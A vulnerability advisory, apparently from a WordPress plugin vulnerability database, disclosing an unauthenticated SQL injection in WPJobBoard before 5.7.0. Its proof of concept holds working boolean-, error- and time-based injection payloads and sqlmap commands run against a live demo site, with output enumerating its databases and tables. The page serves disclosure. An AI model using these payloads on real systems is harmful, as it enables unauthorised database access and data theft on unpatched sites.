WordPress Plugin Vulnerabilities
WPJobBoard < 5.7.0 - Unauthenticated SQL Injection
Description
An Unauthenticated SQL Injection vulnerability was discovered in the WPJobBoard plugin v5.6.4 for WordPress. Vulnerable parameters: type, category.
Proof of Concept
[$] :: Payloads (Boolean-based blind): /advanced-search/?query=4325&location=4325&type=7)) AND 2392=(SELECT (CASE WHEN (2392=2392) THEN 2392 ELSE (SELECT 8365 UNION SELECT 6110) END))-- -&category=2&posted=30&results=1 /advanced-search/?query=4325&location=4325&type=7&category=2)) AND 5421=(SELECT (CASE WHEN (5421=5421) THEN 5421 ELSE (SELECT 5942 UNION SELECT 8466) END))-- -&posted=30&results=1 [$] :: Payloads (Error-based): /advanced-search/?query=4325&location=4325&type=7)) AND EXTRACTVALUE(4031,CONCAT(0x5c,0x7171627a71,(SELECT (ELT(4031=4031,1))),0x717a6a7171)) AND ((1099=1099&category=2&posted=30&results=1 /advanced-search/?query=4325&location=4325&type=7&category=2)) AND EXTRACTVALUE(5255,CONCAT(0x5c,0x7171627a71,(SELECT (ELT(5255=5255,1))),0x717a6a7171)) AND ((5637=5637&posted=30&results=1 [$] :: Payloads (Time-based blind): /advanced-search/?query=4325&location=4325&type=7)) AND SLEEP(5)#&category=2&posted=30&results=1 /advanced-search/?query=4325&location=4325&type=7&category=2)) AND SLEEP(5)#&posted=30&results=1 [!] :: PoC (SQLMap): sqlmap --url="https://demo.wpjobboard.net/jobs/advanced-search/?query=4325&location=4325&type=7&category=2&posted=30&results=1" -dbs --user-agent=X --threads=2 --disable-precon --no-cast [*] starting @ 15:47:39 /2020-10-24/ [15:47:39] [INFO] testing connection to the target URL [15:47:45] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.1 (Percona fork) [15:47:45] [INFO] fetching database names [15:47:47] [WARNING] reflective value(s) found and filtering out [15:47:47] [WARNING] the SQL query provided does not return any output [15:47:47] [INFO] fetching number of databases [15:47:47] [INFO] resumed: 2 [15:47:47] [INFO] retrieving the length of query output [15:47:47] [INFO] retrieved: 18 [15:49:10] [INFO] retrieved: information_schema [15:49:10] [INFO] retrieving the length of query output [15:49:10] [INFO] retrieved: 18 [15:50:31] [INFO] retrieved: simpliko_wpjb_demo available databases [2]: [*] information_schema [REDACTED] [*] ending @ 15:50:31 /2020-10-24/ sqlmap --url="https://demo.wpjobboard.net/jobs/advanced-search/?query=4325&location=4325&type=7&category=2&posted=30&results=1" -D REDACTED -tables --user-agent=X --threads=4 --disable-precon --no-cast [*] starting @ 15:51:03 /2020-10-24/ [15:51:09] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.1 (Percona fork) [15:51:09] [INFO] fetching tables for database: 'REDACTED' Database: REDACTED [32 tables] [REDACTED] [*] ending @ 15:51:12 /2020-10-24/
Affects Plugins
Fixed in version 5.7.0
References
Classification
Miscellaneous
Original Researcher
Ex.Mi
Submitter
Ex.Mi
Submitter website
Verified
No
Timeline
Publicly Published
2020-11-25 (about 1 years ago)
Added
2020-11-25 (about 1 years ago)
Last Updated
2020-11-26 (about 1 years ago)